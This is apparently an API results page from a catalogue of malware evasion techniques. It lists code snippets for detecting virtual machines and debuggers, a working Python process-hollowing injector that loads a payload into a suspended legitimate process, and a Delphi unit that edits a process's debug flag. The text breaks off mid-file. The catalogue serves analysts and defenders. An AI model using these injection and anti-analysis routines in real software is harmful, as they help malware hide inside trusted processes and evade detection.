HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 206,
"next": null,
"previous": "https://unprotect.it/api/snippets/?format=api&page=4",
"results": [
{
"id": 8,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/7/?format=api",
"description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5",
"plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result : Not Detected\\n\\n\");\r\n}"
},
{
"id": 6,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@microsoft.com\n\n",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/34/?format=api",
"description": "Python snippet to detect the drive size with `GetDiskFreeSpaceExW`",
"plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n if size_bytes == 0:\r\n return \"0B\"\r\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size_bytes, 1024)))\r\n p = math.pow(1024, i)\r\n s = round(size_bytes / p, 2)\r\n return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n size = convert_size(total.value)\r\n print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n disk_size(\"C:/\")"
},
{
"id": 4,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@microsoft.com\n\n",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/12/?format=api",
"description": "This is a snippet to detect most common registry keys created by virtual machines.",
"plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, ®key))\r\n {\r\n if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n {\r\n cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg value exist: \" << (value) << endl;\r\n }\r\n\t}\r\n\r\n else\r\n {\r\n if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n {\r\n cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg value exist: \" << (value) << endl;\r\n }\r\n }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n HKEY hKey;\r\n\r\n // list of registry key related virutal machines\r\n LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n \"HARDWARE\\\\Description\\\\System\",\r\n \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n \"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n };\r\n\r\n\r\n for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n {\r\n\r\n if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n {\r\n cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n }\r\n else\r\n {\r\n cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n }\r\n\r\n }\r\n\r\n // Check for registry Value\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n RegistryArtifacts();\r\n return 0;\r\n}"
},
{
"id": 5,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/67/?format=api",
"description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search of known debuggers.",
"plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n LPWSTR, INT, MAX_PATH,\\\r\n LPDWORD, DWORD, HANDLE,\\\r\n HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n \"\"\"\r\n When a Window handle is found it will output to console several information about spotted process.\r\n :param description: Description of found object.\r\n :param hwnd: Handle of found object.\r\n \"\"\"\r\n lpdwProcessId = ctypes.c_ulong()\r\n\r\n output = \"-\" * 60 + \"\\r\\n\"\r\n output += description + \"\\r\\n\"\r\n output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n PROCESS_QUERY_INFORMATION = 0x0400\r\n PROCESS_VM_READ = 0x0010\r\n\r\n procHandle = ctypes.windll.kernel32.OpenProcess(\r\n PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n False,\r\n lpdwProcessId.value\r\n )\r\n\r\n if procHandle > 0:\r\n output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n path, process_name = os.path.split(lpFilename.value)\r\n\r\n output += f\"Process Name: {process_name}\\r\\n\"\r\n output += f\"Image Path: {path}\\r\\n\"\r\n\r\n ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n \"\"\"\r\n EnumWindows API CallBack\r\n :param hwnd: Current Window Handle\r\n :param lparam: Not used in our case\r\n :return: Always True in our case\r\n \"\"\"\r\n if hwnd > 0:\r\n nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n if nMaxCount > 0:\r\n lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n for description, in_title in contains_in_title:\r\n if in_title in lpWindowName.value:\r\n found(description, hwnd)\r\n\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n '''\r\n Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n '''\r\n fw_debuggers = [\r\n (\"OllyDbg\", \"OLLYDBG\", None),\r\n (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n # ......... #\r\n ]\r\n\r\n '''\r\n Description | Text contained in debugger title.\r\n '''\r\n contains_in_title = [\r\n (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n # ......... #\r\n ]\r\n\r\n # Define GetWindowThreadProcessId API\r\n _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n _GetWindowThreadProcessId.restype = DWORD\r\n\r\n # Define GetModuleFileNameEx API\r\n _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n _GetModuleFileNameEx.restype = DWORD\r\n\r\n '''\r\n Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n '''\r\n for description, lpClassName, lpWindowName in fw_debuggers:\r\n handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n if handle > 0:\r\n found(description, handle)\r\n\r\n '''\r\n Search for Debuggers using EnumWindows API.\r\n We first list all Windows titles then search for a debugger title pattern.\r\n This is useful against debuggers or tools without specific title / classname. \r\n '''\r\n\r\n # Define EnumWindows API\r\n lpEnumFunc = ctypes.WINFUNCTYPE(\r\n BOOL,\r\n HWND,\r\n LPARAM\r\n )\r\n\r\n _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n _EnumWindows.argtypes = [\r\n lpEnumFunc,\r\n LPARAM\r\n ]\r\n\r\n # Define GetWindowTextW API\r\n _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n _GetWindowText.restype = INT\r\n\r\n # Enumerate Windows through Windows API\r\n _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
},
{
"id": 3,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/88/?format=api",
"description": "",
"plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n ('hProcess', c_void_p), \r\n ('hThread', c_void_p), \r\n ('dwProcessId', c_ulong), \r\n ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n ('cb', c_ulong), \r\n ('lpReserved', c_char_p), \r\n ('lpDesktop', c_char_p),\r\n ('lpTitle', c_char_p),\r\n ('dwX', c_ulong),\r\n ('dwY', c_ulong),\r\n ('dwXSize', c_ulong),\r\n ('dwYSize', c_ulong),\r\n ('dwXCountChars', c_ulong),\r\n ('dwYCountChars', c_ulong),\r\n ('dwFillAttribute', c_ulong),\r\n ('dwFlags', c_ulong),\r\n ('wShowWindow', c_ushort),\r\n ('cbReserved2', c_ushort),\r\n ('lpReserved2', c_ulong), \r\n ('hStdInput', c_void_p),\r\n ('hStdOutput', c_void_p),\r\n ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n (\"ControlWord\", c_ulong),\r\n (\"StatusWord\", c_ulong),\r\n (\"TagWord\", c_ulong),\r\n (\"ErrorOffset\", c_ulong),\r\n (\"ErrorSelector\", c_ulong),\r\n (\"DataOffset\", c_ulong),\r\n (\"DataSelector\", c_ulong),\r\n (\"RegisterArea\", c_ubyte * 80),\r\n (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n _fields_ = [\r\n (\"ContextFlags\", c_ulong),\r\n (\"Dr0\", c_ulong),\r\n (\"Dr1\", c_ulong),\r\n (\"Dr2\", c_ulong),\r\n (\"Dr3\", c_ulong),\r\n (\"Dr6\", c_ulong),\r\n (\"Dr7\", c_ulong),\r\n (\"FloatSave\", FLOATING_SAVE_AREA),\r\n (\"SegGs\", c_ulong),\r\n (\"SegFs\", c_ulong),\r\n (\"SegEs\", c_ulong),\r\n (\"SegDs\", c_ulong),\r\n (\"Edi\", c_ulong),\r\n (\"Esi\", c_ulong),\r\n (\"Ebx\", c_ulong),\r\n (\"Edx\", c_ulong),\r\n (\"Ecx\", c_ulong),\r\n (\"Eax\", c_ulong),\r\n (\"Ebp\", c_ulong),\r\n (\"Eip\", c_ulong),\r\n (\"SegCs\", c_ulong),\r\n (\"EFlags\", c_ulong),\r\n (\"Esp\", c_ulong),\r\n (\"SegSs\", c_ulong),\r\n (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n print \"[!]Error: \" + FormatError(GetLastError())\r\n print \"[!]Exiting\"\r\n print \"[!]The process may still be running\"\r\n sys.exit()\r\n \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n None,\r\n target_exe,\r\n None,\r\n None,\r\n False,\r\n CREATE_SUSPENDED,\r\n None,\r\n None,\r\n byref(startupinfo),\r\n byref(processinfo)) == 0:\r\n error()\r\n \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n c_int(payload_size+1),\r\n MEM_COMMIT | MEM_RESERVE,\r\n PAGE_READWRITE)\r\n\r\n\r\nmemmove( payload_data_pointer,\r\n payload_data,\r\n payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress == payload_ImageBase:\r\n if not windll.ntdll.NtUnmapViewOfSection(\r\n hProcess,\r\n target_ImageBase):\r\n error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n hProcess, \r\n c_char_p(payload_ImageBase), \r\n c_int(payload_SizeOfImage), \r\n MEM_COMMIT|MEM_RESERVE, \r\n PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(payload_ImageBase),\r\n c_char_p(payload_data_pointer),\r\n c_int(payload_SizeOfHeaders),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n section = payload_sections[i]\r\n dst = payload_ImageBase + section.VirtualAddress\r\n src = payload_data_pointer + section.PointerToRawData\r\n size = section.SizeOfRawData\r\n print\r\n print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n stepcount += 1\r\n print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n print \"\\t[+]Writing to: \" + str(hex(dst))\r\n print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n lpNumberOfBytesWritten = c_size_t(0)\r\n\r\n if windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(dst),\r\n c_char_p(src),\r\n c_int(size),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n \r\n print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n hProcess,\r\n c_char_p(cx.Ebx+8),\r\n c_char_p(payload_data_pointer+0x11C),\r\n c_int(4),\r\n byref(lpNumberOfBytesWritten)) == 0:\r\n error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n hThread,\r\n byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
},
{
"id": 1,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/61/?format=api",
"description": "",
"plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n PROCESS_BASIC_INFORMATION = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n ProcessHandle : THandle;\r\n ProcessInformationClass : DWORD;\r\n ProcessInformation : Pointer;\r\n ProcessInformationLength :\r\n ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : Int64;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : Int64;\r\n BasePriority : Int64;\r\n UniqueProcessId : Int64;\r\n InheritedUniquePID : Int64;\r\n end;\r\n{$ELSE}\r\ntype\r\n PProcessBasicInformation = ^TProcessBasicInformation;\r\n TProcessBasicInformation = record\r\n ExitStatus : DWORD;\r\n PebBaseAddress : Pointer;\r\n AffinityMask : DWORD;\r\n BasePriority : DWORD;\r\n UniqueProcessId : DWORD;\r\n InheritedUniquePID : DWORD;\r\n end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n Open a process and retrieve the point of debug flag from PEB.\r\n\r\n If function succeed, don't forget to call close process handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI : TProcessBasicInformation;\r\n ARetLen : Cardinal;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n AProcessHandle := 0;\r\n\r\n if NOT Assigned(_NtQueryInformationProcess) then\r\n Exit();\r\n ///\r\n\r\n AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n if (AProcessHandle = 0) then\r\n Exit;\r\n\r\n if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n else\r\n CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Retrieve the target process debug status from PEB.\r\n\r\n ADebugStatus = True : Target process debug flag is set.\r\n ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess : THandle;\r\n\r\n pDebugFlagOffset : Pointer;\r\n pDebugFlag : pByte;\r\n ABytesRead : SIZE_T;\r\nbegin\r\n result := false;\r\n ///\r\n\r\n pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n if not Assigned(pDebugFlagOffset) then\r\n Exit();\r\n ///\r\n try\r\n getMem(pDebugFlag, sizeOf(Byte));\r\n try\r\n if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n Exit;\r\n\r\n ///\r\n ADebugStatus := (pDebugFlag^ = 1);\r\n finally\r\n FreeMem(pDebugFlag);\r\n end;\r\n\r\n ///\r\n result := (ABytesRead = SizeOf(Byte));\r\n finally\r\n CloseHandle(hProcess);\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Update target process debug flag.\r\n\r\n ADebugStatus = True : Set target process debug flag.\r\n ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess : THandle;\r\n\r\n pDebugFlagOffset : Pointer;\r\n ADebugFlag : Byte;\r\n ABytesWritten : SIZE_T;\r\nbegin\r\n result := false;\r\n ///\r\n\r\n pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n if not Assigned(pDebugFlagOffset) then\r\n Exit();\r\n ///\r\n try\r\n if ADebugStatus then\r\n ADebugFlag := 1\r\n else\r\n ADebugFlag := 0;\r\n\r\n if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n Exit;\r\n\r\n ///\r\n result := (ABytesWritten = SizeOf(Byte));\r\n finally\r\n CloseHandle(hProcess);\r\n end;\r\nend;\r\n\r\ninitialization\r\n {\r\n Load NtQueryInformationProcess from NTDLL.dll\r\n }\r\n _NtQueryInformationProcess := nil;\r\n\r\n hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n if (hNTDLL <> 0) then\r\n @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n _NtQueryInformationProcess := nil;\r\n\r\n if 